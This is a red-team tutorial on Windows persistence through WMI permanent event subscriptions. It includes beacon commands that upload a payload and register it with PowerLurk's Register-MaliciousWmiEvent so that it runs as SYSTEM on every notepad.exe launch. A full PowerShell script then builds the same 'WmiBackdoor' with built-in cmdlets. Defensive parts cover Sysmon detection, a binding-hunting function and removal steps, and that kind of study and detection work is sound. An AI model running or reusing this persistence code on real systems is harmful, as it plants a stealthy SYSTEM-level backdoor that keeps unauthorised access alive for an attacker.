Requirements
High integrity or SYSTEM
In order to maintain persistence through WMI, we need three classes (__EventFilter, __EventConsumer and __FilterToConsumerBinding, all living in the root\subscription namespace):

EventConsumer: an action to perform (i.e. execute the payload via a command line, PowerShell, VBScript, etc.). In practice this is one of the concrete subclasses, typically CommandLineEventConsumer or ActiveScriptEventConsumer.
EventFilter: a WQL query that defines which event to act on
FilterToConsumerBinding: links an EventFilter to an EventConsumer

We can build these WMI classes using PowerLurk.
Demonstration
beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
You can view these classes afterwards using Get-WmiEvent -Name WmiBackdoor. The CommandLineTemplate for the EventConsumer will simply be C:\Windows\dns_x64.exe, and the Query for the EventFilter will be SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'. The consumer runs under WmiPrvSE.exe as SYSTEM every time a process named notepad.exe starts, so a payload that does not exit will accumulate one instance per launch.
To remove the backdoor:
Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject

Note that creating and deleting these objects is visible to Sysmon (event IDs 19, 20 and 21 for filter, consumer and binding activity) where it is deployed, so the registration itself is a detection opportunity.
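As an added example that is not part of the original page or of PowerLurk, the script below builds the same WmiBackdoor subscription with only the Windows PowerShell 5.1 WMI cmdlets (which is what the beacon powershell command runs), lists every permanent binding with its resolved query and action (useful both to verify the backdoor and to hunt for someone else's), and removes it. The function names New-/Get-/Remove-WmiPersistence are my own; the payload path, event name and trigger process are the ones used above and are assumed for the demonstration. It needs a high integrity or SYSTEM context.

```powershell
# Added example (not from the page or PowerLurk): the WmiBackdoor subscription
# built, listed and removed with built-in Windows PowerShell 5.1 cmdlets.
# Requires a high-integrity or SYSTEM shell. Names and the payload path are
# the ones used on this page and are assumptions for the demonstration.

$Ns = 'root\subscription'   # permanent event subscriptions live here

function New-WmiPersistence {
    param(
        [string]$Name        = 'WmiBackdoor',
        [string]$Command     = 'C:\Windows\dns_x64.exe',
        [string]$ProcessName = 'notepad.exe'
    )
    # 1. __EventFilter: the WQL query for the trigger. Win32_ProcessStartTrace
    #    is an extrinsic event, so no WITHIN polling clause is required.
    $filter = Set-WmiInstance -Namespace $Ns -Class __EventFilter -Arguments @{
        Name           = $Name
        EventNamespace = 'root\cimv2'
        QueryLanguage  = 'WQL'
        Query          = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='$ProcessName'"
    }
    # 2. CommandLineEventConsumer: concrete __EventConsumer subclass that runs a
    #    command line. CommandLineTemplate is what PowerLurk fills in from
    #    -PermanentCommand.
    $consumer = Set-WmiInstance -Namespace $Ns -Class CommandLineEventConsumer -Arguments @{
        Name                = $Name
        CommandLineTemplate = $Command
    }
    # 3. __FilterToConsumerBinding: ties the two together. Filter and Consumer
    #    are object references; Set-WmiInstance converts the objects to paths.
    Set-WmiInstance -Namespace $Ns -Class __FilterToConsumerBinding -Arguments @{
        Filter   = $filter
        Consumer = $consumer
    }
}

function Get-WmiPersistence {
    # Hunting view: every permanent binding with its resolved query and action.
    # Enumerating __EventConsumer returns instances of all its subclasses.
    $filters   = @{}
    $consumers = @{}
    Get-WmiObject -Namespace $Ns -Class __EventFilter   | ForEach-Object { $filters[$_.Name]   = $_ }
    Get-WmiObject -Namespace $Ns -Class __EventConsumer | ForEach-Object { $consumers[$_.Name] = $_ }

    Get-WmiObject -Namespace $Ns -Class __FilterToConsumerBinding | ForEach-Object {
        # Reference properties look like __EventFilter.Name="WmiBackdoor"
        $fName = if ($_.Filter   -match 'Name="([^"]+)"') { $Matches[1] }
        $cName = if ($_.Consumer -match 'Name="([^"]+)"') { $Matches[1] }
        $c = $consumers[$cName]
        [pscustomobject]@{
            Filter        = $fName
            Query         = $filters[$fName].Query
            Consumer      = $cName
            ConsumerClass = $c.__CLASS
            # CommandLineEventConsumer carries CommandLineTemplate,
            # ActiveScriptEventConsumer carries ScriptText.
            Action        = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        }
    }
}

function Remove-WmiPersistence {
    param([string]$Name = 'WmiBackdoor')
    # Manual equivalent of: Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject
    # Binding first so no dangling reference is left behind.
    Get-WmiObject -Namespace $Ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -match "Name=`"$Name`"" } | Remove-WmiObject
    Get-WmiObject -Namespace $Ns -Class __EventConsumer -Filter "Name='$Name'" | Remove-WmiObject
    Get-WmiObject -Namespace $Ns -Class __EventFilter   -Filter "Name='$Name'" | Remove-WmiObject
}

# Usage:
#   New-WmiPersistence
#   Get-WmiPersistence | Format-Table -AutoSize   # WmiBackdoor plus any legitimate subscriptions
#   Remove-WmiPersistence
```

Get-WmiPersistence deliberately walks the bindings rather than the filters or consumers alone: an orphaned filter or consumer does nothing, so the binding is the object that makes a subscription live, and it is the one to look at first when triaging a host.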